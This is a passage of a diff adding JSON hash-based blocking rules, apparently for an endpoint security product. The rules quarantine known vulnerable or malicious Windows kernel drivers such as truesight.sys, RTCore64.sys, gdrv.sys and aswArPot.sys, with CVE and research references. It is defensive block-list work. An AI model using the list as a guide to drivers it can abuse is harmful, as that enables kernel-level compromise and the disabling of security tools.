+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829558Z",
+ "creation_date": "2026-03-23T11:45:31.829560Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829565Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bc05218d56b9c39b3f953e9e602542767d5edff4add56599a8a6aa2539ed8306",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a81286ee-88a6-58da-8eca-93a90f7ff296",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454737Z",
+ "creation_date": "2026-03-23T11:45:30.454740Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454749Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19dba69b48b085d9487cc23a4135f3ef4849c181965bffc55baed9fa6c205429",
+ "comment": "Vulnerable Kernel Driver (aka xjokercontroller.sys) [https://www.loldrivers.io/drivers/b3fd8560-79d3-40b7-b05f-c78044176c8c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a81c472d-5c43-5026-9bf8-defb10384178",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607240Z",
+ "creation_date": "2026-03-23T11:45:29.607242Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607248Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cdd2a4575a46bada4837a6153a79c14d60ee3129830717ef09e0e3efd9d00812",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a821a2ac-790c-5311-a695-8c978683d680",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816012Z",
+ "creation_date": "2026-03-23T11:45:31.816015Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816023Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "813f09d9d8afd970a14e2482b7486606ac18456f89392ec054a482fb63d760c7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a821c0b5-62b8-5ca2-8dac-6092abfbac29",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475860Z",
+ "creation_date": "2026-03-23T11:45:31.475864Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475892Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ee69db23ee91aad6e57170e9ab94ba7501e3f671a099d757a0ddba01b2ccab4a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a822b18a-28ae-5ac3-ad76-430bd6340703",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149644Z",
+ "creation_date": "2026-03-23T11:45:31.149647Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149655Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2f8d9a34ee4fb589f38265c1bf8b672f05c8266feed1b95cea2b2312a6a32c38",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a82ebafe-232c-597f-9da3-de2b0413a57f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808723Z",
+ "creation_date": "2026-03-23T11:45:31.808725Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808731Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c01bd3d635e5886b1484504e3bde5d4aa667c256b88a0be258f9abb0611fa56",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a847147f-be03-57c2-800a-08dcd9349904",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488413Z",
+ "creation_date": "2026-03-23T11:45:31.488415Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488421Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "01434817f4e9adf62573291ee5aa6dea65151cb79535a1c9957381f8c58c2b6c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a847b08f-bf26-519d-aa81-43526577e08d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819243Z",
+ "creation_date": "2026-03-23T11:45:30.819245Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819250Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f3a182bbeba28dd15e1ad52041b8b32670651686697224cad821a334a8600da",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a8499f85-0830-5c39-88f2-c05eff9b4a17",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609003Z",
+ "creation_date": "2026-03-23T11:45:29.609005Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609011Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "092d04284fdeb6762e65e6ac5b813920d6c69a5e99d110769c5c1a78e11c5ba0",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a849d96d-9bf2-5625-9fea-185ca88de0c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471598Z",
+ "creation_date": "2026-03-23T11:45:30.471601Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471610Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "20e52e0d7f579dc6884cc6e80266fddceda69ea5fdd0b095c0874b0d877e48a2",
+ "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a8539e0a-5543-5a4f-9c57-9dc6c9b9289b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968845Z",
+ "creation_date": "2026-03-23T11:45:29.968846Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968852Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1023dcd4c80db19e9f82f95b1c5e1ddb60db7ac034848dd5cc1c78104a6350f4",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a858dafa-b597-5722-aeef-08c21cb3b0c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808049Z",
+ "creation_date": "2026-03-23T11:45:31.808051Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808060Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "68d1635780247024a4475579000212aacc64e81ed59b745cefa749df82df6a7d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a85fa80b-4f78-5ed4-be65-8226bf7b84d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142970Z",
+ "creation_date": "2026-03-23T11:45:31.142971Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142977Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "99576f526ca1a82531030da2946513cba2b396310e31d4c7835725e7298ebe39",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a863fde7-b926-50a0-a120-eba8ef97a7aa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155924Z",
+ "creation_date": "2026-03-23T11:45:31.155926Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155932Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "650f32fd7b1f4af7523464937377aeaed41d72b1e6954e0036cd347d5eb8f792",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a86ccc16-085a-5dd0-9273-b94db89c65db",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455610Z",
+ "creation_date": "2026-03-23T11:45:30.455613Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455622Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7702f240800528d8186e3e6a26e2680486fed65a6fb5a2a000ad12c1fb61a398",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a871665d-51ce-5073-980b-b215a3c5f70c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985685Z",
+ "creation_date": "2026-03-23T11:45:29.985687Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985692Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d0d8dcc01aba3ac08084ad40df3c64e7dfdd26ad403b08e610b96e2fcaf8a713",
+ "comment": "Malicious Kernel Driver related to WINTAPIX (aka WinTapix.sys and SRVNET2.SYS) [https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a87200fe-24cf-5474-9704-49f4e0480421",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972371Z",
+ "creation_date": "2026-03-23T11:45:29.972373Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972378Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "727666434d5ea292a7631d0944edd36097db12862730996ce8a3f052be04a2cd",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a87e18e6-2986-5f6f-85bc-438b74234674",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982271Z",
+ "creation_date": "2026-03-23T11:45:29.982273Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982279Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4cff6e53430b81ecc4fae453e59a0353bcfe73dd5780abfc35f299c16a97998e",
+ "comment": "Vulnerable Kernel Driver (aka t3.sys) [https://www.loldrivers.io/drivers/31a962ce-43ef-410f-873a-7ccc8f00332b/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a8842d7a-3156-5926-a1e0-bf806cdebf15",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145729Z",
+ "creation_date": "2026-03-23T11:45:31.145731Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145737Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dc5205f4653d4f1f26dd23d00f83746c5e5fae208a55851add88ee2ef4352f9d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a89cdefa-b7b4-5273-92fe-0e00c746b8bd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493006Z",
+ "creation_date": "2026-03-23T11:45:31.493009Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493018Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "421383a2fe20328af88ab454b863484805640dd5902e6c5f07e6bf3f9cbb9f5a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a8bc7cb5-4a83-5e4c-a37c-cd93c0d097fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472496Z",
+ "creation_date": "2026-03-23T11:45:31.472499Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472508Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7939d3cac950f51ebcf360eb14283705da2083114170d1a179deb7b13a3afc9b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "a8c63869-3265-5ff3-85be-b738e4b5b2ac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975895Z",
+ "creation_date": "2026-03-23T11:45:29.975897Z",
+ "enabled": true,
